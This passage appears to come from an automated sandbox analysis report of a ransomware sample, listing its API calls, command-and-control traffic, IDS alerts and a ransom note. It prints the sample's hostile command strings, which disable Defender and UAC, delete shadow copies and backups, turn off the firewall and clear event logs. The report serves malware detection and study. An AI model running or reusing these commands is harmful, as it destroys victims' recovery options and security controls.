      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,48_2_00028380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_0002AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,48_2_0002AF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000DBA6B FindFirstFileExA,48_2_000DBA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00029ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,48_2_00029ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8D950 GetLogicalDriveStringsA,0_2_00A8D950

      Networking

      Source: Network traffic | Suricata IDS: 2045821 - Severity 1 - ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity : 192.168.2.10:49715 -> 185.147.34.53:3586
      Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 3586
      Source: global traffic | TCP traffic: 192.168.2.10:49715 -> 185.147.34.53:3586
      Source: global traffic | HTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:42:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~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&21L0I*7.999268(2)2,d5Evo.team1992@gmail.com HTTP/1.1 | Host: 185.147.34.53 | Connection: close
      Source: Joe Sandbox View | IP Address: 104.26.13.205
      Source: Joe Sandbox View | IP Address: 185.147.34.53
      Source: Joe Sandbox View | ASN Name: HOSTSLIM-GLOBAL-NETWORKNL
      Source: unknown | DNS query: name: api.ipify.org (reported twice)
      Source: unknown | TCP traffic detected without corresponding DNS query: 185.147.34.53 (reported three times)
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A78CB0 std::locale::_Init,WSAStartup,socket,gethostbyname,htons,connect,send,recv,recv,closesocket,WSACleanup,0_2_00A78CB0
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: text/* | User-Agent: YourUserAgent | Host: api.ipify.org
      Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
      Source: BiXS3FRoLe.exe, 00000000.00000002.2503580325.0000000000769000.00000004.00000010.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/)
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/E
      The strings below were extracted from svchost.exe memory, not from the sample. They are Bing Maps / Windows Maps endpoints (platform background activity) and are not indicators of this sample's behaviour.
      Source: svchost.exe, 00000006.00000002.1364826982.000001F12F613000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
      Source: svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
      Source: svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364082851.000001F12F670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365083917.000001F12F672000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
      Source: svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
      Source: svchost.exe, 00000006.00000002.1365100771.000001F12F678000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364027254.000001F12F676000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
      Source: svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000006.00000003.1364011107.000001F12F655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364826982.000001F12F627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
      Source: svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1364296546.000001F12F65E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
      Source: BiXS3FRoLe.exe, Xinfecter.exe.0.drString found in binary or memory: https://www.coinbase.com/how-to-buy/bitcoin
      Source: BiXS3FRoLe.exe, Xinfecter.exe.0.drString found in binary or memory: https://www.kraken.com/learn/buy-bitcoin-btc

      Spam, unwanted Advertisements and Ransom Demands

      Source: Yara match | File source: Process Memory Space: BiXS3FRoLe.exe PID: 7364, type: MEMORYSTR
      Source: Yara match | File source: Process Memory Space: Xinfecter.exe PID: 8172, type: MEMORYSTR
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 0_2_00A94049
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 0_2_00A9C170
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 0_2_00A9D08F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 48_2_00034049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 48_2_0003C170
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 48_2_0003D08F
      Source: BiXS3FRoLe.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: " alt="Paris"></div></br><div class="fnt">Your Files Has Been <span class="xsw">Stolen</span> And <span class="xsw">Encrypted!</span></div></hr></br></br></br><div class="vl"><div class="Mrgnlf">All Your Files Are Locked And Important Data Downloaded !</br></br>Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You .</br></br>If Payment Isn't Made After A While We Will Sell OR Publish Some Of Your Data, You Don't Have Much Time!</br></br>Your ID : <span class="spnn"><html><head><title>reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentp
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe, 00000000.00000000.1257811411.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000000.1257811411.0000000000B53000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: Xinfecter.exe, 00000030.00000000.1392310632.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 00000030.00000000.1392310632.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe, 00000030.00000002.1394748759.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 00000030.00000002.1394748759.00000000000F3000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: S-6748.bat.0.dr | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe.0.dr | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe.0.dr | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet

      System Summary

      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AFC860: CreateFileW,DeviceIoControl,CloseHandle,0_2_00AFC860
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A940490_2_00A94049
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A9C1700_2_00A9C170
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A846700_2_00A84670
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A792A00_2_00A792A0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB00800_2_00AB0080
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD81A00_2_00AD81A0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE41100_2_00AE4110
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B042D40_2_00B042D4
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A802390_2_00A80239
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A882400_2_00A88240
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A883800_2_00A88380
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD84400_2_00AD8440
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADC7C50_2_00ADC7C5
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE48D00_2_00AE48D0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A78A800_2_00A78A80
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B40B040_2_00B40B04
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE4B700_2_00AE4B70
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB8E900_2_00AB8E90
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB0E000_2_00AB0E00
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B08E4A0_2_00B08E4A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4FA70_2_00AD4FA7
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD4FB40_2_00AD4FB4
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B18FE00_2_00B18FE0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADCF3F0_2_00ADCF3F
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AC12A00_2_00AC12A0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADD2C60_2_00ADD2C6
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B192520_2_00B19252
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD533B0_2_00AD533B
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A753300_2_00A75330
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB54000_2_00AB5400
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B195C40_2_00B195C4
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADD5570_2_00ADD557
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB16300_2_00AB1630
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B398790_2_00B39879
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B1986E0_2_00B1986E
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ADD9900_2_00ADD990
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE99080_2_00AE9908
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A89ABA0_2_00A89ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A7DAB00_2_00A7DAB0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8DAF00_2_00A8DAF0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A85AC00_2_00A85AC0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B19B350_2_00B19B35
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B31B710_2_00B31B71
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD5C840_2_00AD5C84
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B29CD00_2_00B29CD0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B19DF00_2_00B19DF0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD5EA80_2_00AD5EA8
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD62EB0_2_00AD62EB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00ABA2C00_2_00ABA2C0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AC23C00_2_00AC23C0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AD67460_2_00AD6746
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8E8300_2_00A8E830
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B2E90D0_2_00B2E90D
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A86AF70_2_00A86AF7
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B06A580_2_00B06A58
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8AF500_2_00A8AF50
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AB33000_2_00AB3300
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B2B47B0_2_00B2B47B
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B235A30_2_00B235A3
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AFF5F00_2_00AFF5F0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8F5700_2_00A8F570
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B237D20_2_00B237D2
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B1B8170_2_00B1B817
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE38600_2_00AE3860
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B03AE50_2_00B03AE5
